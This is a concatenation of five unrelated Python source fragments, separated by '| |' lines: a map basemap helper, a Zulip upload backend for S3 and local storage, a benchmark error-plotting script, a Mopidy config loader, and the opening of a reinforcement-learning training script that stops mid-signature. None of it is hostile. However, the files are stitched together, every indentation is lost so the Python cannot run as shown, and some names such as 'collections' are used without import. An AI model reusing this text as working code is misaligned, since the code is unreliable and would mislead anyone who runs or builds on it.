'This theme is not valid. Valid themes types are: {}.'.format(
', '.join(constants.THEMES)
))
if not theme and basemap == Basemaps.darkmatter:
return 'dark'
return theme
def get_token(basemap):
if isinstance(basemap, dict):
if 'token' in basemap:
return basemap.get('token')
return ''
def get_basecolor(basemap):
if basemap is None:
return 'white'
elif isinstance(basemap, str):
if basemap not in [Basemaps.voyager, Basemaps.positron, Basemaps.darkmatter]:
return basemap # Basemap is a color
return ''
def get_basemap(basemap):
if isinstance(basemap, dict):
token = get_token(basemap)
if 'style' in basemap:
if not token and basemap.get('style').startswith('mapbox://'):
warn('A Mapbox style usually needs a token')
return basemap.get('style')
else:
raise ValueError('If basemap is a dict, it must have a `style` key')
return ''
| |
from typing import Any, Dict, Mapping, Optional, Tuple, Text
from django.utils.translation import ugettext as _
from django.conf import settings
from django.template.defaultfilters import slugify
from django.core.files import File
from django.http import HttpRequest
from django.db.models import Sum
from jinja2 import Markup as mark_safe
import unicodedata
from zerver.lib.avatar_hash import user_avatar_path
from zerver.lib.exceptions import JsonableError, ErrorCode
from zerver.lib.str_utils import force_str, NonBinaryStr
from boto.s3.bucket import Bucket
from boto.s3.key import Key
from boto.s3.connection import S3Connection
from mimetypes import guess_type, guess_extension
from zerver.lib.str_utils import force_bytes, force_str
from zerver.models import get_user_profile_by_id, RealmEmoji
from zerver.models import Attachment
from zerver.models import Realm, RealmEmoji, UserProfile, Message
import urllib
import base64
import os
import re
from PIL import Image, ImageOps
import io
import random
import logging
DEFAULT_AVATAR_SIZE = 100
MEDIUM_AVATAR_SIZE = 500
DEFAULT_EMOJI_SIZE = 64
# Performance Note:
#
# For writing files to S3, the file could either be stored in RAM
# (if it is less than 2.5MiB or so) or an actual temporary file on disk.
#
# Because we set FILE_UPLOAD_MAX_MEMORY_SIZE to 0, only the latter case
# should occur in practice.
#
# This is great, because passing the pseudofile object that Django gives
# you to boto would be a pain.
# To come up with a s3 key we randomly generate a "directory". The
# "file name" is the original filename provided by the user run
# through a sanitization function.
attachment_url_re = re.compile('[/\-]user[\-_]uploads[/\.-].*?(?=[ )]|\Z)')
def attachment_url_to_path_id(attachment_url: Text) -> Text:
path_id_raw = re.sub('[/\-]user[\-_]uploads[/\.-]', '', attachment_url)
# Remove any extra '.' after file extension. These are probably added by the user
return re.sub('[.]+$', '', path_id_raw, re.M)
def sanitize_name(value: NonBinaryStr) -> Text:
"""
Sanitizes a value to be safe to store in a Linux filesystem, in
S3, and in a URL. So unicode is allowed, but not special
characters other than ".", "-", and "_".
This implementation is based on django.utils.text.slugify; it is
modified by:
* adding '.' and '_' to the list of allowed characters.
* preserving the case of the value.
"""
value = unicodedata.normalize('NFKC', value)
value = re.sub('[^\w\s._-]', '', value, flags=re.U).strip()
return mark_safe(re.sub('[-\s]+', '-', value, flags=re.U))
def random_name(bytes: int=60) -> Text:
return base64.urlsafe_b64encode(os.urandom(bytes)).decode('utf-8')
class BadImageError(JsonableError):
code = ErrorCode.BAD_IMAGE
class ExceededQuotaError(JsonableError):
code = ErrorCode.QUOTA_EXCEEDED
def resize_avatar(image_data: bytes, size: int=DEFAULT_AVATAR_SIZE) -> bytes:
try:
im = Image.open(io.BytesIO(image_data))
im = ImageOps.fit(im, (size, size), Image.ANTIALIAS)
except IOError:
raise BadImageError("Could not decode image; did you upload an image file?")
out = io.BytesIO()
im.save(out, format='png')
return out.getvalue()
def resize_emoji(image_data: bytes, size: int=DEFAULT_EMOJI_SIZE) -> bytes:
try:
im = Image.open(io.BytesIO(image_data))
image_format = im.format
if image_format == 'GIF' and im.is_animated:
if im.size[0] != im.size[1]:
raise JsonableError(
_("Animated emoji must have the same width and height."))
elif im.size[0] > size:
raise JsonableError(
_("Animated emoji can't be larger than 64px in width or height."))
else:
return image_data
im = ImageOps.fit(im, (size, size), Image.ANTIALIAS)
except IOError:
raise BadImageError("Could not decode image; did you upload an image file?")
out = io.BytesIO()
im.save(out, format=image_format)
return out.getvalue()
### Common
class ZulipUploadBackend:
def upload_message_image(self, uploaded_file_name, uploaded_file_size,
content_type, file_data, user_profile, target_realm=None):
# type: (Text, int, Optional[Text], bytes, UserProfile, Optional[Realm]) -> Text
raise NotImplementedError()
def upload_avatar_image(self, user_file: File,
acting_user_profile: UserProfile,
target_user_profile: UserProfile) -> None:
raise NotImplementedError()
def delete_message_image(self, path_id: Text) -> bool:
raise NotImplementedError()
def get_avatar_url(self, hash_key: Text, medium: bool=False) -> Text:
raise NotImplementedError()
def ensure_medium_avatar_image(self, user_profile: UserProfile) -> None:
raise NotImplementedError()
def upload_realm_icon_image(self, icon_file: File, user_profile: UserProfile) -> None:
raise NotImplementedError()
def get_realm_icon_url(self, realm_id: int, version: int) -> Text:
raise NotImplementedError()
def upload_emoji_image(self, emoji_file: File, emoji_file_name: Text, user_profile: UserProfile) -> None:
raise NotImplementedError()
def get_emoji_url(self, emoji_file_name: Text, realm_id: int) -> Text:
raise NotImplementedError()
### S3
def get_bucket(conn: S3Connection, bucket_name: Text) -> Bucket:
# Calling get_bucket() with validate=True can apparently lead
# to expensive S3 bills:
# http://www.appneta.com/blog/s3-list-get-bucket-default/
# The benefits of validation aren't completely clear to us, and
# we want to save on our bills, so we set the validate flag to False.
# (We think setting validate to True would cause us to fail faster
# in situations where buckets don't exist, but that shouldn't be
# an issue for us.)
bucket = conn.get_bucket(bucket_name, validate=False)
return bucket
def upload_image_to_s3(
bucket_name,
file_name,
content_type,
user_profile,
contents):
# type: (NonBinaryStr, Text, Optional[Text], UserProfile, bytes) -> None
conn = S3Connection(settings.S3_KEY, settings.S3_SECRET_KEY)
bucket = get_bucket(conn, bucket_name)
key = Key(bucket)
key.key = file_name
key.set_metadata("user_profile_id", str(user_profile.id))
key.set_metadata("realm_id", str(user_profile.realm_id))
if content_type is not None:
headers = {'Content-Type': content_type} # type: Optional[Dict[Text, Text]]
else:
headers = None
key.set_contents_from_string(contents, headers=headers) # type: ignore # https://github.com/python/typeshed/issues/1552
def get_total_uploads_size_for_user(user: UserProfile) -> int:
uploads = Attachment.objects.filter(owner=user)
total_quota = uploads.aggregate(Sum('size'))['size__sum']
# In case user has no uploads
if (total_quota is None):
total_quota = 0
return total_quota
def within_upload_quota(user: UserProfile, uploaded_file_size: int) -> bool:
total_quota = get_total_uploads_size_for_user(user)
if (total_quota + uploaded_file_size > user.quota):
return False
else:
return True
def get_file_info(request: HttpRequest, user_file: File) -> Tuple[Text, int, Optional[Text]]:
uploaded_file_name = user_file.name
assert isinstance(uploaded_file_name, str)
content_type = request.GET.get('mimetype')
if content_type is None:
guessed_type = guess_type(uploaded_file_name)[0]
if guessed_type is not None:
content_type = guessed_type
else:
extension = guess_extension(content_type)
if extension is not None:
uploaded_file_name = uploaded_file_name + extension
uploaded_file_name = urllib.parse.unquote(uploaded_file_name)
uploaded_file_size = user_file.size
return uploaded_file_name, uploaded_file_size, content_type
def get_signed_upload_url(path: Text) -> Text:
conn = S3Connection(settings.S3_KEY, settings.S3_SECRET_KEY)
return conn.generate_url(15, 'GET', bucket=settings.S3_AUTH_UPLOADS_BUCKET, key=path)
def get_realm_for_filename(path: Text) -> Optional[int]:
conn = S3Connection(settings.S3_KEY, settings.S3_SECRET_KEY)
key = get_bucket(conn, settings.S3_AUTH_UPLOADS_BUCKET).get_key(path)
if key is None:
# This happens if the key does not exist.
return None
return get_user_profile_by_id(key.metadata["user_profile_id"]).realm_id
class S3UploadBackend(ZulipUploadBackend):
def upload_message_image(self, uploaded_file_name, uploaded_file_size,
content_type, file_data, user_profile, target_realm=None):
# type: (Text, int, Optional[Text], bytes, UserProfile, Optional[Realm]) -> Text
bucket_name = settings.S3_AUTH_UPLOADS_BUCKET
if target_realm is None:
target_realm = user_profile.realm
s3_file_name = "/".join([
str(target_realm.id),
random_name(18),
sanitize_name(uploaded_file_name)
])
url = "/user_uploads/%s" % (s3_file_name,)
upload_image_to_s3(
bucket_name,
s3_file_name,
content_type,
user_profile,
file_data
)
create_attachment(uploaded_file_name, s3_file_name, user_profile, uploaded_file_size)
return url
def delete_message_image(self, path_id: Text) -> bool:
conn = S3Connection(settings.S3_KEY, settings.S3_SECRET_KEY)
bucket = get_bucket(conn, settings.S3_AUTH_UPLOADS_BUCKET)
# check if file exists
key = bucket.get_key(path_id)
if key is not None:
bucket.delete_key(key)
return True
file_name = path_id.split("/")[-1]
logging.warning("%s does not exist. Its entry in the database will be removed." % (file_name,))
return False
def upload_avatar_image(self, user_file: File,
acting_user_profile: UserProfile,
target_user_profile: UserProfile) -> None:
content_type = guess_type(user_file.name)[0]
bucket_name = settings.S3_AVATAR_BUCKET
s3_file_name = user_avatar_path(target_user_profile)
image_data = user_file.read()
upload_image_to_s3(
bucket_name,
s3_file_name + ".original",
content_type,
target_user_profile,
image_data,
)
# custom 500px wide version
resized_medium = resize_avatar(image_data, MEDIUM_AVATAR_SIZE)
upload_image_to_s3(
bucket_name,
s3_file_name + "-medium.png",
"image/png",
target_user_profile,
resized_medium
)
resized_data = resize_avatar(image_data)
upload_image_to_s3(
bucket_name,
s3_file_name,
'image/png',
target_user_profile,
resized_data,
)
# See avatar_url in avatar.py for URL. (That code also handles the case
# that users use gravatar.)
def get_avatar_url(self, hash_key: Text, medium: bool=False) -> Text:
bucket = settings.S3_AVATAR_BUCKET
medium_suffix = "-medium.png" if medium else ""
# ?x=x allows templates to append additional parameters with &s
return u"https://%s.s3.amazonaws.com/%s%s?x=x" % (bucket, hash_key, medium_suffix)
def upload_realm_icon_image(self, icon_file: File, user_profile: UserProfile) -> None:
content_type = guess_type(icon_file.name)[0]
bucket_name = settings.S3_AVATAR_BUCKET
s3_file_name = os.path.join(str(user_profile.realm.id), 'realm', 'icon')
image_data = icon_file.read()
upload_image_to_s3(
bucket_name,
s3_file_name + ".original",
content_type,
user_profile,
image_data,
)
resized_data = resize_avatar(image_data)
upload_image_to_s3(
bucket_name,
s3_file_name + ".png",
'image/png',
user_profile,
resized_data,
)
# See avatar_url in avatar.py for URL. (That code also handles the case
# that users use gravatar.)
def get_realm_icon_url(self, realm_id: int, version: int) -> Text:
bucket = settings.S3_AVATAR_BUCKET
# ?x=x allows templates to append additional parameters with &s
return u"https://%s.s3.amazonaws.com/%s/realm/icon.png?version=%s" % (bucket, realm_id, version)
def ensure_medium_avatar_image(self, user_profile: UserProfile) -> None:
file_path = user_avatar_path(user_profile)
s3_file_name = file_path
bucket_name = settings.S3_AVATAR_BUCKET
conn = S3Connection(settings.S3_KEY, settings.S3_SECRET_KEY)
bucket = get_bucket(conn, bucket_name)
key = bucket.get_key(file_path)
image_data = force_bytes(key.get_contents_as_string())
resized_medium = resize_avatar(image_data, MEDIUM_AVATAR_SIZE)
upload_image_to_s3(
bucket_name,
s3_file_name + "-medium.png",
"image/png",
user_profile,
resized_medium
)
def upload_emoji_image(self, emoji_file: File, emoji_file_name: Text,
user_profile: UserProfile) -> None:
content_type = guess_type(emoji_file.name)[0]
bucket_name = settings.S3_AVATAR_BUCKET
emoji_path = RealmEmoji.PATH_ID_TEMPLATE.format(
realm_id=user_profile.realm_id,
emoji_file_name=emoji_file_name
)
image_data = emoji_file.read()
resized_image_data = resize_emoji(image_data)
upload_image_to_s3(
bucket_name,
".".join((emoji_path, "original")),
content_type,
user_profile,
image_data,
)
upload_image_to_s3(
bucket_name,
emoji_path,
content_type,
user_profile,
resized_image_data,
)
def get_emoji_url(self, emoji_file_name: Text, realm_id: int) -> Text:
bucket = settings.S3_AVATAR_BUCKET
emoji_path = RealmEmoji.PATH_ID_TEMPLATE.format(realm_id=realm_id,
emoji_file_name=emoji_file_name)
return u"https://%s.s3.amazonaws.com/%s" % (bucket, emoji_path)
### Local
def write_local_file(type: Text, path: Text, file_data: bytes) -> None:
file_path = os.path.join(settings.LOCAL_UPLOADS_DIR, type, path)
os.makedirs(os.path.dirname(file_path), exist_ok=True)
with open(file_path, 'wb') as f:
f.write(file_data)
def get_local_file_path(path_id: Text) -> Optional[Text]:
local_path = os.path.join(settings.LOCAL_UPLOADS_DIR, 'files', path_id)
if os.path.isfile(local_path):
return local_path
else:
return None
class LocalUploadBackend(ZulipUploadBackend):
def upload_message_image(self, uploaded_file_name, uploaded_file_size,
content_type, file_data, user_profile, target_realm=None):
# type: (Text, int, Optional[Text], bytes, UserProfile, Optional[Realm]) -> Text
# Split into 256 subdirectories to prevent directories from getting too big
path = "/".join([
str(user_profile.realm_id),
format(random.randint(0, 255), 'x'),
random_name(18),
sanitize_name(uploaded_file_name)
])
write_local_file('files', path, file_data)
create_attachment(uploaded_file_name, path, user_profile, uploaded_file_size)
return '/user_uploads/' + path
def delete_message_image(self, path_id: Text) -> bool:
file_path = os.path.join(settings.LOCAL_UPLOADS_DIR, 'files', path_id)
if os.path.isfile(file_path):
# This removes the file but the empty folders still remain.
os.remove(file_path)
return True
file_name = path_id.split("/")[-1]
logging.warning("%s does not exist. Its entry in the database will be removed." % (file_name,))
return False
def upload_avatar_image(self, user_file: File,
acting_user_profile: UserProfile,
target_user_profile: UserProfile) -> None:
file_path = user_avatar_path(target_user_profile)
image_data = user_file.read()
write_local_file('avatars', file_path + '.original', image_data)
resized_data = resize_avatar(image_data)
write_local_file('avatars', file_path + '.png', resized_data)
resized_medium = resize_avatar(image_data, MEDIUM_AVATAR_SIZE)
write_local_file('avatars', file_path + '-medium.png', resized_medium)
def get_avatar_url(self, hash_key: Text, medium: bool=False) -> Text:
# ?x=x allows templates to append additional parameters with &s
medium_suffix = "-medium" if medium else ""
return u"/user_avatars/%s%s.png?x=x" % (hash_key, medium_suffix)
def upload_realm_icon_image(self, icon_file: File, user_profile: UserProfile) -> None:
upload_path = os.path.join('avatars', str(user_profile.realm.id), 'realm')
image_data = icon_file.read()
write_local_file(
upload_path,
'icon.original',
image_data)
resized_data = resize_avatar(image_data)
write_local_file(upload_path, 'icon.png', resized_data)
def get_realm_icon_url(self, realm_id: int, version: int) -> Text:
# ?x=x allows templates to append additional parameters with &s
return u"/user_avatars/%s/realm/icon.png?version=%s" % (realm_id, version)
def ensure_medium_avatar_image(self, user_profile: UserProfile) -> None:
file_path = user_avatar_path(user_profile)
output_path = os.path.join(settings.LOCAL_UPLOADS_DIR, "avatars", file_path + "-medium.png")
if os.path.isfile(output_path):
return
image_path = os.path.join(settings.LOCAL_UPLOADS_DIR, "avatars", file_path + ".original")
image_data = open(image_path, "rb").read()
resized_medium = resize_avatar(image_data, MEDIUM_AVATAR_SIZE)
write_local_file('avatars', file_path + '-medium.png', resized_medium)
def upload_emoji_image(self, emoji_file: File, emoji_file_name: Text,
user_profile: UserProfile) -> None:
emoji_path = RealmEmoji.PATH_ID_TEMPLATE.format(
realm_id= user_profile.realm_id,
emoji_file_name=emoji_file_name
)
image_data = emoji_file.read()
resized_image_data = resize_emoji(image_data)
write_local_file(
'avatars',
".".join((emoji_path, "original")),
image_data)
write_local_file(
'avatars',
emoji_path,
resized_image_data)
def get_emoji_url(self, emoji_file_name: Text, realm_id: int) -> Text:
return os.path.join(
u"/user_avatars",
RealmEmoji.PATH_ID_TEMPLATE.format(realm_id=realm_id, emoji_file_name=emoji_file_name))
# Common and wrappers
if settings.LOCAL_UPLOADS_DIR is not None:
upload_backend = LocalUploadBackend() # type: ZulipUploadBackend
else:
upload_backend = S3UploadBackend()
def delete_message_image(path_id: Text) -> bool:
return upload_backend.delete_message_image(path_id)
def upload_avatar_image(user_file: File, acting_user_profile: UserProfile,
target_user_profile: UserProfile) -> None:
upload_backend.upload_avatar_image(user_file, acting_user_profile, target_user_profile)
def upload_icon_image(user_file: File, user_profile: UserProfile) -> None:
upload_backend.upload_realm_icon_image(user_file, user_profile)
def upload_emoji_image(emoji_file: File, emoji_file_name: Text, user_profile: UserProfile) -> None:
upload_backend.upload_emoji_image(emoji_file, emoji_file_name, user_profile)
def upload_message_image(uploaded_file_name, uploaded_file_size,
content_type, file_data, user_profile, target_realm=None):
# type: (Text, int, Optional[Text], bytes, UserProfile, Optional[Realm]) -> Text
return upload_backend.upload_message_image(uploaded_file_name, uploaded_file_size,
content_type, file_data, user_profile,
target_realm=target_realm)
def claim_attachment(user_profile: UserProfile,
path_id: Text,
message: Message,
is_message_realm_public: bool) -> None:
attachment = Attachment.objects.get(path_id=path_id)
attachment.messages.add(message)
attachment.is_realm_public = attachment.is_realm_public or is_message_realm_public
attachment.save()
def create_attachment(file_name: Text, path_id: Text, user_profile: UserProfile,
file_size: int) -> bool:
Attachment.objects.create(file_name=file_name, path_id=path_id, owner=user_profile,
realm=user_profile.realm, size=file_size)
return True
def upload_message_image_from_request(request: HttpRequest, user_file: File,
user_profile: UserProfile) -> Text:
uploaded_file_name, uploaded_file_size, content_type = get_file_info(request, user_file)
return upload_message_image(uploaded_file_name, uploaded_file_size,
content_type, user_file.read(), user_profile)
| |
#! /usr/bin/env python3
import sys
import math
from mule.plotting.Plotting import *
from mule.postprocessing.JobsData import *
from mule.postprocessing.JobsDataConsolidate import *
sys.path.append('../')
import pretty_plotting as pp
sys.path.pop()
#mule_plotting_usetex(False)
groups = ['runtime.timestepping_method', 'runtime.rexi_files_coefficients.0.unique_id_string']
tagnames_y = [
'sphere_data_diff_prog_phi_pert.res_norm_l1',
'sphere_data_diff_prog_phi_pert.res_norm_l2',
'sphere_data_diff_prog_phi_pert.res_norm_linf',
]
j = JobsData('./job_bench_*', verbosity=0)
c = JobsDataConsolidate(j)
print("")
print("Groups:")
job_groups = c.create_groups(groups)
for key, g in job_groups.items():
print(key)
for tagname_y in tagnames_y:
params = []
params += [
{
'tagname_x': 'runtime.timestep_size',
'xlabel': "Timestep size (seconds)",
'ylabel': pp.latex_pretty_names[tagname_y],
'title': 'Timestep size vs. error',
'xscale': 'log',
'yscale': 'log',
},
]
params += [
{
'tagname_x': 'output.simulation_benchmark_timings.main_timestepping',
'xlabel': "Wallclock time (seconds)",
'ylabel': pp.latex_pretty_names[tagname_y],
'title': 'Wallclock time vs. error',
'xscale': 'log',
'yscale': 'log',
},
]
for param in params:
tagname_x = param['tagname_x']
xlabel = param['xlabel']
ylabel = param['ylabel']
title = param['title']
xscale = param['xscale']
yscale = param['yscale']
print("*"*80)
print("Processing tag "+tagname_x)
print("*"*80)
if True:
"""
Plotting format
"""
# Filter out errors beyond this value!
def data_filter(x, y, jobdata):
if y == None:
return True
x = float(x)
y = float(y)
if math.isnan(y):
return True
if 'prog_phi' in tagname_y:
return False
if 'l1' in tagname_y:
if y > 1e5:
print("Sorting out L1 data "+str(y))
return True
elif 'l2' in tagname_y:
if y > 1e5:
print("Sorting out L2 data "+str(y))
return True
elif 'linf' in tagname_y:
if y > 1e6:
print("Sorting out Linf data "+str(y))
return True
else:
raise Exception("Unknown y tag "+tagname_y)
else:
print("TODO")
return False
d = JobsData_GroupsPlottingScattered(
job_groups,
tagname_x,
tagname_y,
data_filter = data_filter
)
fileid = "output_plotting_"+tagname_x.replace('.', '-').replace('_', '-')+"_vs_"+tagname_y.replace('.', '-').replace('_', '-')
if True:
#
# Proper naming and sorting of each label
#
# new data dictionary
data_new = {}
for key, data in d.data.items():
print("Processing "+key)
print(" + x_values: ", str(data['x_values']))
print(" + y_values: ", str(data['y_values']))
if len(data['x_values']) == 0:
print(" + skipping "+key+": No value available")
continue
if '_exp_' in key:
if len(data['x_values']) <= 1:
print(" + skipping "+key+": Only one value available")
continue
s = key.split('__')
# generate nice tex label
if len(s) == 1:
data['label'] = pp.get_pretty_name(s[0])
else:
data['label'] = pp.get_pretty_name(s[0])+" "+s[1].replace("_", " ")
key_new = pp.get_pretty_name_order(s[0])+'_'+key
# copy data
data_new[key_new] = copy.copy(data)
# Copy back new data table
d.data = data_new
p = Plotting_ScatteredData()
def fun(p):
from matplotlib import ticker
from matplotlib.ticker import FormatStrFormatter
plt.tick_params(axis='x', which='minor')
p.ax.xaxis.set_minor_formatter(FormatStrFormatter("%.0f"))
p.ax.xaxis.set_major_formatter(FormatStrFormatter("%.0f"))
p.ax.xaxis.set_minor_locator(ticker.LogLocator(subs=[1.5, 2.0, 3.0, 5.0]))
for tick in p.ax.xaxis.get_minor_ticks():
tick.label.set_fontsize(8)
plt.tick_params(axis='y', which='minor')
p.ax.yaxis.set_minor_formatter(FormatStrFormatter("%.1e"))
p.ax.yaxis.set_major_formatter(FormatStrFormatter("%.1e"))
p.ax.yaxis.set_minor_locator(ticker.LogLocator(subs=[1.5, 2.0, 3.0, 5.0]))
for tick in p.ax.yaxis.get_minor_ticks():
tick.label.set_fontsize(6)
for key, data in d.get_data_float().items():
print(key, data)
annotate_text_template = "{:.1f} / {:.3f}"
p.plot(
data_plotting = d.get_data_float(),
xlabel = xlabel,
ylabel = ylabel,
title = title,
xscale = xscale,
yscale = yscale,
#annotate = True,
#annotate_each_nth_value = 3,
#annotate_fontsize = 6,
#annotate_text_template = annotate_text_template,
legend_fontsize = 6,
grid = True,
outfile = fileid+".pdf",
lambda_fun = fun,
)
print("Data plotting:")
d.print()
d.write(fileid+".csv")
print("Info:")
print(" NaN: Errors in simulations")
print(" None: No data available")
| |
from __future__ import unicode_literals
import ConfigParser as configparser
import io
import itertools
import logging
import os.path
import re
from mopidy.config import keyring
from mopidy.config.schemas import * # noqa
from mopidy.config.types import * # noqa
from mopidy.utils import path, versioning
logger = logging.getLogger(__name__)
_logging_schema = ConfigSchema('logging')
_logging_schema['color'] = Boolean()
_logging_schema['console_format'] = String()
_logging_schema['debug_format'] = String()
_logging_schema['debug_file'] = Path()
_logging_schema['config_file'] = Path(optional=True)
_loglevels_schema = LogLevelConfigSchema('loglevels')
_audio_schema = ConfigSchema('audio')
_audio_schema['mixer'] = String()
_audio_schema['mixer_track'] = Deprecated()
_audio_schema['mixer_volume'] = Integer(optional=True, minimum=0, maximum=100)
_audio_schema['output'] = String()
_audio_schema['visualizer'] = String(optional=True)
_proxy_schema = ConfigSchema('proxy')
_proxy_schema['scheme'] = String(optional=True,
choices=['http', 'https', 'socks4', 'socks5'])
_proxy_schema['hostname'] = Hostname(optional=True)
_proxy_schema['port'] = Port(optional=True)
_proxy_schema['username'] = String(optional=True)
_proxy_schema['password'] = Secret(optional=True)
# NOTE: if multiple outputs ever comes something like LogLevelConfigSchema
# _outputs_schema = config.AudioOutputConfigSchema()
_schemas = [_logging_schema, _loglevels_schema, _audio_schema, _proxy_schema]
_INITIAL_HELP = """
# For further information about options in this file see:
# http://docs.mopidy.com/
#
# The initial commented out values reflect the defaults as of:
# %(versions)s
#
# Available options and defaults might have changed since then,
# run `mopidy config` to see the current effective config and
# `mopidy --version` to check the current version.
"""
def read(config_file):
"""Helper to load config defaults in same way across core and extensions"""
with io.open(config_file, 'rb') as filehandle:
return filehandle.read()
def load(files, extensions, overrides):
# Helper to get configs, as the rest of our config system should not need
# to know about extensions.
config_dir = os.path.dirname(__file__)
defaults = [read(os.path.join(config_dir, 'default.conf'))]
defaults.extend(e.get_default_config() for e in extensions)
raw_config = _load(files, defaults, keyring.fetch() + (overrides or []))
schemas = _schemas[:]
schemas.extend(e.get_config_schema() for e in extensions)
return _validate(raw_config, schemas)
def format(config, extensions, comments=None, display=True):
# Helper to format configs, as the rest of our config system should not
# need to know about extensions.
schemas = _schemas[:]
schemas.extend(e.get_config_schema() for e in extensions)
return _format(config, comments or {}, schemas, display, False)
def format_initial(extensions):
config_dir = os.path.dirname(__file__)
defaults = [read(os.path.join(config_dir, 'default.conf'))]
defaults.extend(e.get_default_config() for e in extensions)
raw_config = _load([], defaults, [])
schemas = _schemas[:]
schemas.extend(e.get_config_schema() for e in extensions)
config, errors = _validate(raw_config, schemas)
versions = ['Mopidy %s' % versioning.get_version()]
for extension in sorted(extensions, key=lambda ext: ext.dist_name):
versions.append('%s %s' % (extension.dist_name, extension.version))
description = _INITIAL_HELP.strip() % {'versions': '\n# '.join(versions)}
return description + '\n\n' + _format(config, {}, schemas, False, True)
def _load(files, defaults, overrides):
parser = configparser.RawConfigParser()
files = [path.expand_path(f) for f in files]
sources = ['builtin defaults'] + files + ['command line options']
logger.info('Loading config from: %s', ', '.join(sources))
# TODO: simply return path to config file for defaults so we can load it
# all in the same way?
for default in defaults:
if isinstance(default, unicode):
default = default.encode('utf-8')
parser.readfp(io.BytesIO(default))
# Load config from a series of config files
for filename in files:
try:
with io.open(filename, 'rb') as filehandle:
parser.readfp(filehandle)
except configparser.MissingSectionHeaderError as e:
logger.warning('%s does not have a config section, not loaded.',
filename)
except configparser.ParsingError as e:
linenos = ', '.join(str(lineno) for lineno, line in e.errors)
logger.warning(
'%s has errors, line %s has been ignored.', filename, linenos)
except IOError:
# TODO: if this is the initial load of logging config we might not
# have a logger at this point, we might want to handle this better.
logger.debug('Config file %s not found; skipping', filename)
# If there have been parse errors there is a python bug that causes the
# values to be lists, this little trick coerces these into strings.
parser.readfp(io.BytesIO())
raw_config = {}
for section in parser.sections():
raw_config[section] = dict(parser.items(section))
for section, key, value in overrides:
raw_config.setdefault(section, {})[key] = value
return raw_config
def _validate(raw_config, schemas):
# Get validated config
config = {}
errors = {}
for schema in schemas:
values = raw_config.get(schema.name, {})
result, error = schema.deserialize(values)
if error:
errors[schema.name] = error
if result:
config[schema.name] = result
return config, errors
def _format(config, comments, schemas, display, disable):
output = []
for schema in schemas:
serialized = schema.serialize(
config.get(schema.name, {}), display=display)
if not serialized:
continue
output.append(b'[%s]' % bytes(schema.name))
for key, value in serialized.items():
if isinstance(value, types.DeprecatedValue):
continue
comment = bytes(comments.get(schema.name, {}).get(key, ''))
output.append(b'%s =' % bytes(key))
if value is not None:
output[-1] += b' ' + value
if comment:
output[-1] += b' ; ' + comment.capitalize()
if disable:
output[-1] = re.sub(r'^', b'#', output[-1], flags=re.M)
output.append(b'')
return b'\n'.join(output).strip()
def _preprocess(config_string):
"""Convert a raw config into a form that preserves comments etc."""
results = ['[__COMMENTS__]']
counter = itertools.count(0)
section_re = re.compile(r'^(\[[^\]]+\])\s*(.+)$')
blank_line_re = re.compile(r'^\s*$')
comment_re = re.compile(r'^(#|;)')
inline_comment_re = re.compile(r' ;')
def newlines(match):
return '__BLANK%d__ =' % next(counter)
def comments(match):
if match.group(1) == '#':
return '__HASH%d__ =' % next(counter)
elif match.group(1) == ';':
return '__SEMICOLON%d__ =' % next(counter)
def inlinecomments(match):
return '\n__INLINE%d__ =' % next(counter)
def sections(match):
return '%s\n__SECTION%d__ = %s' % (
match.group(1), next(counter), match.group(2))
for line in config_string.splitlines():
line = blank_line_re.sub(newlines, line)
line = section_re.sub(sections, line)
line = comment_re.sub(comments, line)
line = inline_comment_re.sub(inlinecomments, line)
results.append(line)
return '\n'.join(results)
def _postprocess(config_string):
"""Converts a preprocessed config back to original form."""
flags = re.IGNORECASE | re.MULTILINE
result = re.sub(r'^\[__COMMENTS__\](\n|$)', '', config_string, flags=flags)
result = re.sub(r'\n__INLINE\d+__ =(.*)$', ' ;\g<1>', result, flags=flags)
result = re.sub(r'^__HASH\d+__ =(.*)$', '#\g<1>', result, flags=flags)
result = re.sub(r'^__SEMICOLON\d+__ =(.*)$', ';\g<1>', result, flags=flags)
result = re.sub(r'\n__SECTION\d+__ =(.*)$', '\g<1>', result, flags=flags)
result = re.sub(r'^__BLANK\d+__ =$', '', result, flags=flags)
return result
class Proxy(collections.Mapping):
def __init__(self, data):
self._data = data
def __getitem__(self, key):
item = self._data.__getitem__(key)
if isinstance(item, dict):
return Proxy(item)
return item
def __iter__(self):
return self._data.__iter__()
def __len__(self):
return self._data.__len__()
def __repr__(self):
return b'Proxy(%r)' % self._data
| |
# coding=utf-8
# Copyright 2022 The Google Research Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Main training script. See README.md for usage instructions."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import functools
import os
import time
from absl import app
from absl import flags
from absl import logging
import classifiers
import darc_agent
import darc_envs
import gin
import numpy as np
from six.moves import range
import tensorflow as tf
from tf_agents.agents.ddpg import critic_network
from tf_agents.agents.sac import tanh_normal_projection_network
from tf_agents.drivers import dynamic_step_driver
from tf_agents.eval import metric_utils
from tf_agents.metrics import tf_metrics
from tf_agents.networks import actor_distribution_network
from tf_agents.policies import greedy_policy
from tf_agents.policies import random_tf_policy
from tf_agents.replay_buffers import tf_uniform_replay_buffer
from tf_agents.utils import common
flags.DEFINE_string(
"root_dir",
None,
"Root directory for writing logs/summaries/checkpoints.",
)
flags.DEFINE_multi_string("gin_file", None, "Path to the trainer config files.")
flags.DEFINE_multi_string("gin_bindings", None, "Gin binding to pass through.")
FLAGS = flags.FLAGS
@gin.configurable
def train_eval(
root_dir,
environment_name="broken_reacher",
num_iterations=1000000,
actor_fc_layers=(256, 256),
critic_obs_fc_layers=None,
critic_action_fc_layers=None,
critic_joint_fc_layers=(256, 256),
initial_collect_steps=10000,
real_initial_collect_steps=10000,
collect_steps_per_iteration=1,
real_collect_interval=10,
replay_buffer_capacity=1000000,
# Params for target update
target_update_tau=0.005,
target_update_period=1,
# Params for train
train_steps_per_iteration=1,
batch_size=256,
actor_learning_rate=3e-4,
critic_learning_rate=3e-4,
classifier_learning_rate=3e-4,
alpha_learning_rate=3e-4,
td_errors_loss_fn=tf.math.squared_difference,
gamma=0.99,
reward_scale_factor=0.1,
gradient_clipping=None,
use_tf_functions=True,
# Params for eval
num_eval_episodes=30,
eval_interval=10000,
# Params for summaries and logging
train_checkpoint_interval=10000,
policy_checkpoint_interval=5000,
rb_checkpoint_interval=50000,
log_interval=1000,
summary_interval=1000,
